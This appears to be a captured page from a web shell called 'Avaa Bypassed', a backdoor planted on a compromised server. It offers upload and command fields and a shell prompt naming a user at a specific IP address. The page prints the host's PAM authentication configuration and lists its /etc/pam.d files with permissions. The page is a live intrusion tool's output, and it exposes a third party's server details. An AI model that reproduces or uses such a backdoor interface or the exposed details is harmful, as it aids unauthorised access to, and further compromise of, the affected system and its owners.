[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.23.103.132: ~ $
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      pam_env.so
auth	required	pam_hulk.so
auth        sufficient    pam_unix.so nullok try_first_pass
auth        requisite     pam_succeed_if.so uid >= 1000 quiet_success
auth        required      pam_deny.so

account     required      pam_unix.so
account     sufficient    pam_localuser.so
account     sufficient    pam_succeed_if.so uid < 1000 quiet
account     required      pam_permit.so

password    requisite     pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type=
password    sufficient    pam_unix.so sha512 shadow nullok try_first_pass use_authtok
password    required      pam_deny.so

session     optional      pam_keyinit.so revoke
session     required      pam_limits.so
-session     optional      pam_systemd.so
session     [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid
session     required      pam_unix.so

Filemanager

Name Type Size Permission Actions
atd File 272 B 0644
chfn File 342 B 0644
chsh File 342 B 0644
config-util File 232 B 0644
crond File 287 B 0644
dovecot File 157 B 0644
exim File 116 B 0644
fingerprint-auth File 702 B 0644
fingerprint-auth-ac File 702 B 0644
login File 796 B 0644
other File 154 B 0644
passwd File 188 B 0644
password-auth File 1000 B 0644
password-auth-ac File 1000 B 0644
polkit-1 File 155 B 0644
postgresql_cpses File 70 B 0644
postlogin File 330 B 0644
postlogin-ac File 330 B 0644
ppp File 144 B 0644
pure-ftpd File 466 B 0644
qemu-ga File 46 B 0644
remote File 681 B 0644
runuser File 143 B 0644
runuser-l File 138 B 0644
screen File 36 B 0644
smartcard-auth File 752 B 0644
smartcard-auth-ac File 752 B 0644
sshd File 943 B 0644
su File 540 B 0644
su-l File 137 B 0644
sudo File 200 B 0644
sudo-i File 178 B 0644
system-auth File 1000 B 0644
system-auth-ac File 1000 B 0644
systemd-user File 129 B 0644
vlock File 84 B 0644